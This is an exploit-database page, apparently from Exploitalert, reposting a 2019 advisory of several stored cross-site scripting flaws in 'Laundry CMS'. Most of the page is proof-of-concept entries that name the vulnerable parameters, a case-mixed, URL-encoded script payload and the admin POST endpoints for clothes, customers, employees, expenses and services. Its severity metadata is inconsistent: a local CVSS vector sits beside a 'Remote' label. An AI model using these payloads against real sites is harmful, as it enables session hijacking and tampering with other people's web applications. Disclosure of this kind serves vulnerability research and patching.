Advertisement






Laundry CMS - Multiple XSS Inj.

CVE Category Price Severity
CVE-XXXX-XXXX CWE-79 Not specified High
Author Risk Exploitation Type Date
Not specified High Remote 2019-04-15
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019040127

Below is a copy:

Laundry CMS - Multiple XSS Inj.
===========================================================================================
# Exploit Title: Laundry CMS cloth_code XSS Inj.
# Dork: N/A
# Date: 09-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://laundry.rpcits.co.in/
# Software Link: https://sourceforge.net/projects/laundry/
# Version: New
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: The Laundry Management Application is a very simple and Online Services
  with mobile and computer friendly themes development.
===========================================================================================
# POC - XSS
# Parameters : cloth_code
# Attack Pattern : %3cscRipt%3ealert(0x002333)%3c%2fscRipt%3e
# POST Method : http://localhost/laundry/index.php/admin/cloth_crud/create
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Laundry CMS Multiple XSS Inj.
# Dork: N/A
# Date: 09-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://laundry.rpcits.co.in/
# Software Link: https://sourceforge.net/projects/laundry/
# Version: New
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: The Laundry Management Application is a very simple and Online Services
  with mobile and computer friendly themes development.
===========================================================================================
# POC - XSS
# Parameters : last_name, password, email, phone, first_name, status, join_date, address, 
# Attack Pattern : %3cscRipt%3ealert(0x001E26)%3c%2fscRipt%3e
# POST Method : http://localhost/laundry/index.php/admin/customer_crud/create
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Laundry CMS Multiple XSS Inj.
# Dork: N/A
# Date: 09-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://laundry.rpcits.co.in/
# Software Link: https://sourceforge.net/projects/laundry/
# Version: New
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: The Laundry Management Application is a very simple and Online Services
  with mobile and computer friendly themes development.
===========================================================================================
# POC - XSS
# Parameters : last_name, password, email, phone, first_name, status, join_date, address, gender
# Attack Pattern : %3cscRipt%3ealert(0x001E26)%3c%2fscRipt%3e
# POST Method : http://localhost/laundry/index.php/admin/employee_crud/new
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Laundry CMS expse_code XSS Inj.
# Dork: N/A
# Date: 09-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://laundry.rpcits.co.in/
# Software Link: https://sourceforge.net/projects/laundry/
# Version: New
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: The Laundry Management Application is a very simple and Online Services
  with mobile and computer friendly themes development.
===========================================================================================
# POC - XSS
# Parameters : expse_code
# Attack Pattern : %3cscRipt%3ealert(0x002DE2)%3c%2fscRipt%3e 
# POST Method : http://localhost/laundry/index.php/admin/expenses_crud/create
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Laundry CMS service_code XSS Inj.
# Dork: N/A
# Date: 09-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://laundry.rpcits.co.in/
# Software Link: https://sourceforge.net/projects/laundry/
# Version: New
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: The Laundry Management Application is a very simple and Online Services
  with mobile and computer friendly themes development.
===========================================================================================
# POC - XSS
# Parameters : service_code
# Attack Pattern : %3cscRipt%3ealert(0x002DE2)%3c%2fscRipt%3e 
# POST Method : http://localhost/laundry/index.php/admin/service_crud/create
===========================================================================================

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum